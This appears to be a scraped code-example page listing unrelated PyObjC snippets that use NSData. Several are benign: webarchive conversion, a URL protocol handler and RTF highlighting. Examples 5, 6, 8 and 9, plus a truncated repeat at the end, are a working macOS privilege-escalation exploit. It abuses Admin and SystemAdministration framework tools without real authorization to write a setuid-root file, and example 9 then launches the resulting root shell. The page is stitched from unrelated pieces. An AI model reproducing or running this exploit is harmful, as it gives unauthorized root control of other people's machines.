Пример #1
0
    def asWebArchive(self):
        """
        Convert the MHT archive to a webarchive.
        """
        rootType, rootText = self.parts[self.root]
        pageResource = WebResource.alloc().initWithData_URL_MIMEType_textEncodingName_frameName_(
            NSData.dataWithBytes_length_(rootText.replace(b"\\", b"/"), len(rootText)),
            NSURL.URLWithString_(self.fixupURL(self.root)),
            NSString.stringWithString_(rootType),
            None,
            None)

        resources = []
        for url in self.parts:
            if url == self.root:
                continue

            tp, data = self.parts[url]
            resources.append(WebResource.alloc().initWithData_URL_MIMEType_textEncodingName_frameName_(
                NSData.dataWithBytes_length_(data, len(data)),
                NSURL.URLWithString_(self.fixupURL(url)),
                NSString.stringWithString_(tp),
                None,
                None))

        return WebArchive.alloc().initWithMainResource_subresources_subframeArchives_(
            pageResource, resources, None)
Пример #2
0
    def asWebArchive(self):
        """
        Convert the MHT archive to a webarchive.
        """
        rootType, rootText = self.parts[self.root]
        pageResource = WebResource.alloc(
        ).initWithData_URL_MIMEType_textEncodingName_frameName_(
            NSData.dataWithBytes_length_(rootText.replace(b"\\", b"/"),
                                         len(rootText)),
            NSURL.URLWithString_(self.fixupURL(self.root)),
            NSString.stringWithString_(rootType),
            None,
            None,
        )

        resources = []
        for url in self.parts:
            if url == self.root:
                continue

            tp, data = self.parts[url]
            resources.append(WebResource.alloc(
            ).initWithData_URL_MIMEType_textEncodingName_frameName_(
                NSData.dataWithBytes_length_(data, len(data)),
                NSURL.URLWithString_(self.fixupURL(url)),
                NSString.stringWithString_(tp),
                None,
                None,
            ))

        return WebArchive.alloc(
        ).initWithMainResource_subresources_subframeArchives_(
            pageResource, resources, None)
Пример #3
0
    def startLoading(self):
        client = self.client()
        request = self.request()
        urlpath = request.URL().standardizedURL().path()
        modpath = urlpath.replace("/", ".").lstrip(".").replace(".html", "")

        if not PY3K:
            modpath = modpath.encode("utf-8")

        try:
            data = gethtmldoc(modpath)
            if PY3K:
                data = data.encode("utf-8")
        except Exception:
            client.URLProtocol_didFailWithError_(
                self,
                NSError.errorWithDomain_code_userInfo_(
                    NSURLErrorDomain, NSURLErrorResourceUnavailable, None),
            )
        else:
            response = NSURLResponse.alloc(
            ).initWithURL_MIMEType_expectedContentLength_textEncodingName_(  # noqa: B950
                request.URL(), "text/html", len(data), "utf-8")
            client.URLProtocol_didReceiveResponse_cacheStoragePolicy_(
                self, response, NSURLCacheStorageNotAllowed)
            client.URLProtocol_didLoadData_(
                self, NSData.dataWithBytes_length_(data, len(data)))
            client.URLProtocolDidFinishLoading_(self)
Пример #4
0
 def update(self, s):
     retval = None
     # find format
     fmt = 'string'
     if isinstance(s, NSAttributedString):
         fmt = 'NSAttributedString'
     elif isinstance(s, NSData):
         fmt = 'rtf'
     # we only do highlighting if string is supplied
     if fmt == 'string':
         # format the output
         try:
             lexer = guess_lexer(
                 s).__class__ if self.lexer is True else self.lexer
         except pygments.util.ClassNotFound:
             lexer = None
         if lexer is not None:
             rtf = highlight(
                 s,
                 lexer(),
                 RtfFormatter(
                     style=self.style,
                     fontface=self.font,
                     fontsize=self.fontsize *
                     2  # *2 as it wants half points
                 )).encode('utf-8')
             data = NSData.dataWithBytes_length_(rtf, len(rtf))
             retval = self.update(data)
         else:
             # fallback - the string unformatted
             retval = NSAttributedString.alloc().initWithString_(s)
             if self.sel is not None:
                 self.sel(retval)
     elif fmt == 'rtf':
         a = NSAttributedString.alloc().initWithRTF_documentAttributes_(
             s, None)
         retval = a[0]
         if self.sel is not None:
             self.sel(a[0])
     elif fmt == 'NSAttributedString':
         retval = s
         if self.sel is not None:
             self.sel(s)
     else:
         raise ValueError('unsupported format; %s' % fmt)
     return retval
Пример #5
0
    def verify(cls, args):
        source_binary = args['options']['target']
        dest_binary = os.path.realpath(args['options']['dest_binary'])

        if not os.path.exists(source_binary):
            raise Exception("file does not exist!")

        pool = NSAutoreleasePool.alloc().init()

        attr = NSMutableDictionary.alloc().init()
        attr.setValue_forKey_(04777, NSFilePosixPermissions)
        data = NSData.alloc().initWithContentsOfFile_(source_binary)

        print "[*] will write file", dest_binary

        if cls.use_old_api():
            adm_lib = cls.load_lib("/Admin.framework/Admin")
            Authenticator = objc.lookUpClass("Authenticator")
            ToolLiaison = objc.lookUpClass("ToolLiaison")
            SFAuthorization = objc.lookUpClass("SFAuthorization")

            authent = Authenticator.sharedAuthenticator()
            authref = SFAuthorization.authorization()

            # authref with value nil is not accepted on OS X <= 10.8
            authent.authenticateUsingAuthorizationSync_(authref)
            st = ToolLiaison.sharedToolLiaison()
            tool = st.tool()
            tool.createFileWithContents_path_attributes_(
                data, dest_binary, attr)
        else:
            adm_lib = cls.load_lib(
                "/SystemAdministration.framework/SystemAdministration")
            WriteConfigClient = objc.lookUpClass("WriteConfigClient")
            client = WriteConfigClient.sharedClient()
            client.authenticateUsingAuthorizationSync_(None)
            tool = client.remoteProxy()

            tool.createFileWithContents_path_attributes_(
                data, dest_binary, attr, 0)

        print "[+] Done!"
        del pool
        args['success'] = True
        args['poc_ret']['dest_binary'] = dest_binary
        return args
Пример #6
0
    def verify(cls, args):
        source_binary = args['options']['target']
        dest_binary = os.path.realpath(args['options']['dest_binary'])

        if not os.path.exists(source_binary):
            raise Exception("file does not exist!")

        pool = NSAutoreleasePool.alloc().init()

        attr = NSMutableDictionary.alloc().init()
        attr.setValue_forKey_(04777, NSFilePosixPermissions)
        data = NSData.alloc().initWithContentsOfFile_(source_binary)

        print "[*] will write file", dest_binary

        if cls.use_old_api():
            adm_lib = cls.load_lib("/Admin.framework/Admin")
            Authenticator = objc.lookUpClass("Authenticator")
            ToolLiaison = objc.lookUpClass("ToolLiaison")
            SFAuthorization = objc.lookUpClass("SFAuthorization")

            authent = Authenticator.sharedAuthenticator()
            authref = SFAuthorization.authorization()

            # authref with value nil is not accepted on OS X <= 10.8
            authent.authenticateUsingAuthorizationSync_(authref)
            st = ToolLiaison.sharedToolLiaison()
            tool = st.tool()
            tool.createFileWithContents_path_attributes_(data, dest_binary, attr)
        else:
            adm_lib = cls.load_lib("/SystemAdministration.framework/SystemAdministration")
            WriteConfigClient = objc.lookUpClass("WriteConfigClient")
            client = WriteConfigClient.sharedClient()
            client.authenticateUsingAuthorizationSync_(None)
            tool = client.remoteProxy()

            tool.createFileWithContents_path_attributes_(data, dest_binary, attr, 0)

        print "[+] Done!"
        del pool
        args['success'] = True
        args['poc_ret']['dest_binary'] = dest_binary
        return args
Пример #7
0
    def startLoading(self):
        client = self.client()
        request = self.request()
        urlpath = request.URL().standardizedURL().path()
        modpath = urlpath.replace("/", "."
            ).lstrip("."
            ).replace(".html", "")

        if not PY3K:
            modpath = modpath.encode("utf-8")

        try:
            data = gethtmldoc(modpath)
            if PY3K:
                data = data.encode("utf-8")
        except Exception as e:
            client.URLProtocol_didFailWithError_(
                self,
                NSError.errorWithDomain_code_userInfo_(
                    NSURLErrorDomain,
                    NSURLErrorResourceUnavailable,
                    None,
                ),
            )
        else:
            response = NSURLResponse.alloc().initWithURL_MIMEType_expectedContentLength_textEncodingName_(
                request.URL(),
                "text/html",
                len(data),
                "utf-8",
            )
            client.URLProtocol_didReceiveResponse_cacheStoragePolicy_(
                self,
                response,
                NSURLCacheStorageNotAllowed,
            )
            client.URLProtocol_didLoadData_(
                self,
                NSData.dataWithBytes_length_(data, len(data)),
            )
            client.URLProtocolDidFinishLoading_(self)
Пример #8
0
if len(args) != 3:
    print "usage: exploit.py source_binary dest_binary_as_root"
    sys.exit(-1)

source_binary = args[1]
dest_binary = os.path.realpath(args[2])

if not os.path.exists(source_binary):
    raise Exception("file does not exist!")

pool = NSAutoreleasePool.alloc().init()

attr = NSMutableDictionary.alloc().init()
attr.setValue_forKey_(04777, NSFilePosixPermissions)
data = NSData.alloc().initWithContentsOfFile_(source_binary)

print "will write file", dest_binary

if use_old_api():
    adm_lib = load_lib("/Admin.framework/Admin")
    Authenticator = objc.lookUpClass("Authenticator")
    ToolLiaison = objc.lookUpClass("ToolLiaison")
    SFAuthorization = objc.lookUpClass("SFAuthorization")

    authent = Authenticator.sharedAuthenticator()
    authref = SFAuthorization.authorization()

    # authref with value nil is not accepted on OS X <= 10.8
    authent.authenticateUsingAuthorizationSync_(authref)
    st = ToolLiaison.sharedToolLiaison()
Пример #9
0
    def run(self):
        try:

            source_binary = self.options.get("src_file")[1]
            dest_binary = self.options.get("des_file")[1]

            if source_binary == None \
                    or source_binary == "" \
                    or dest_binary == None \
                    or dest_binary == "":
                self.print_error(
                    "It's mandatory to specify a source file and a destination file!!"
                )
                return

            if not os.path.exists(source_binary):
                self.print_error("File does not exist!")
                return

            if os.path.exists(dest_binary):
                self.print_error(
                    "Destination file already exists. Use another name or remove/rename the original file!"
                )
                return

            pool = NSAutoreleasePool.alloc().init()

            attr = NSMutableDictionary.alloc().init()
            attr.setValue_forKey_(0o04777, NSFilePosixPermissions)
            data = NSData.alloc().initWithContentsOfFile_(source_binary)

            self.print_info("will write file " + dest_binary)

            if self.use_old_api():
                adm_lib = self.load_lib("/Admin.framework/Admin")
                Authenticator = objc.lookUpClass("Authenticator")
                ToolLiaison = objc.lookUpClass("ToolLiaison")
                SFAuthorization = objc.lookUpClass("SFAuthorization")

                authent = Authenticator.sharedAuthenticator()
                authref = SFAuthorization.authorization()

                # authref with value nil is not accepted on OS X <= 10.8
                authent.authenticateUsingAuthorizationSync_(authref)
                st = ToolLiaison.sharedToolLiaison()
                tool = st.tool()
                tool.createFileWithContents_path_attributes_(
                    data, dest_binary, attr)
            else:
                adm_lib = self.load_lib(
                    "/SystemAdministration.framework/SystemAdministration")
                WriteConfigClient = objc.lookUpClass("WriteConfigClient")
                client = WriteConfigClient.sharedClient()
                client.authenticateUsingAuthorizationSync_(None)
                tool = client.remoteProxy()

                tool.createFileWithContents_path_attributes_(
                    data, dest_binary, attr, 0)

            self.print_ok("Done!")

            del pool

            while not os.path.exists(dest_binary):
                self.print_info("Waiting file creation...")
                time.sleep(1)

            self.print_ok("Returning root whell at: " + dest_binary)
            subprocess.call(dest_binary)

        except OSError as e:
            if e.errno == os.errno.ENOENT:
                print("Sorry, iSelect binary - Not found!")
            else:
                print("Error executing exploit")
            raise
if len(args) != 3:
    print "usage: exploit.py source_binary dest_binary_as_root"
    sys.exit(-1)

source_binary = args[1]
dest_binary = os.path.realpath(args[2])

if not os.path.exists(source_binary):
    raise Exception("file does not exist!")

pool = NSAutoreleasePool.alloc().init()

attr = NSMutableDictionary.alloc().init()
attr.setValue_forKey_(04777, NSFilePosixPermissions)
data = NSData.alloc().initWithContentsOfFile_(source_binary)

print "will write file", dest_binary

if use_old_api():
    adm_lib = load_lib("/Admin.framework/Admin")
    Authenticator = objc.lookUpClass("Authenticator")
    ToolLiaison = objc.lookUpClass("ToolLiaison")
    SFAuthorization = objc.lookUpClass("SFAuthorization")

    authent = Authenticator.sharedAuthenticator()
    authref = SFAuthorization.authorization()

    # authref with value nil is not accepted on OS X <= 10.8
    authent.authenticateUsingAuthorizationSync_(authref)
    st = ToolLiaison.sharedToolLiaison()